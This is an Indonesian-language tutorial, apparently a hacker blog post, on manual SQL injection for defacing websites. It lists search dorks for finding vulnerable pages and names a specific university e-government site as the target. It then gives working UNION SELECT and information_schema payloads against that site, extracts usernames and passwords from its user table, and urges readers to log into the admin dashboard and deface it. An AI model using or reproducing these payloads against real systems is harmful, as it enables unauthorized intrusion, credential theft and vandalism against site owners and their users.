Assalamualaikum Wr.Wb
Balik Lagi Ama Gw :v
Lama Gak Post Njier :v
Oke Kali Ini Gw Bakal Share Tutorial Deface Sql Secara Manual
Bahan-bahan:
1. Dork
2. Kopi + Rokok
3. Kesabaran
4. Dibutuhkan Ketamvanan
Oke Langsung TKP
Dork:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
Kembangin Sama Otak Wibu Lu
Oke Gw Udah Nemu Target
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431
Oke Cara Ngecek Vuln Sql Atau Enggak Kita Tinggal Nambahin ( ' ) Diakhir Link Tanpa Tanda Kurung
Jadi Seperti Ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431'
Nah Kalo Blank Atau Muncul Tulisan "
You have an error in your SQL syntax" Berarti Vuln
Kalo Target Kita Websitenya Blank
Nah Kalo Udah Nemu Yang Vuln Kita Dump Pake Perintah
+order+by+1--+--
Taruh Dibelakang Link
Jadi Gini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+1--+--
Tapi Itu Gak Blank / Error Jadi Angkanya Digedein Sampek Blank / Error
Nah Gw Nemuin Errornya Diangka 28
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+28--+--
Berarti Jumlah Tabel Pada Databasenya Ada 27
Nah Kalo Udah Ketemu Jumlah Tabelnya Kita Dump Dengan Perintah
+union+select+(sesuai jumlah tabel)--
Tapi Sebelum Angka Kasih Tanda ( - ) Tanpa Tanda Kurung
Jadi Linknya Akan Seperti Ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Nah Kalau Udah Pasti Keluar Angka Keramat :v
Nah Disini Yang Keluar Adalah Angka 9 Jadi Tabel Itulah Yang Sekiranya Dimasukkan Perintah Selanjutnya. Dengan Syarat Angka 9 Tadi Dihapus Dengan Perintah Selanjutnya...
Perintah Selanjutnya Adalah
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Maka Linknya Akan Jadi Seperti Ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Kalo Udah Kita Udah Nemu Nama Nama Tabelnya
Nah Disini Kita Cari Sesuatu Yang Berhubungan Dengan Username Dan Password... Nah Digambar Udah Ada Tabel "user" Yang Berhubungan Dengan Username dan Password... Mari Kita Cari User dan Pass nya Dengan Perintah
(select(@x)from(select(@x:=0x00),(select(@x)from(Nama Tabel)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,Yang Mau Kalian Cari,0x203a3a20,Yang Mau Kalian Cari))))x)
Nah Tulisan Yang Berwarna Biru Sesuaiin Ama Apa Yang Kalian Cari... Berhubung Kita Mau Mencari Username & Password Maka Kita Melakukan Perintah Seperti Berikut
(select(@x)from(select(@x:=0x00),(select(@x)from(user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)
Nah Maka Linknya Berubah Jadi
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(@x)from(user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Maka Akan Muncul Username & Password nya
Sudah Nemu Username + Password nya?
Nunggu Apa Lagi? Login Lah :v
Nah Hal Paling Sulit Di Sql Ya Nemuin Admin Login :v
Berhubung Saya Udah Nemu Tinggal Sikat Aja
Kalo Username & Password nya Bener Langsung Tembus Ke Dashboard
Nih Saya Tembus... Nunggu Apa Lagi? Happy Deface :v
Jangan Lupa Share & Coment :v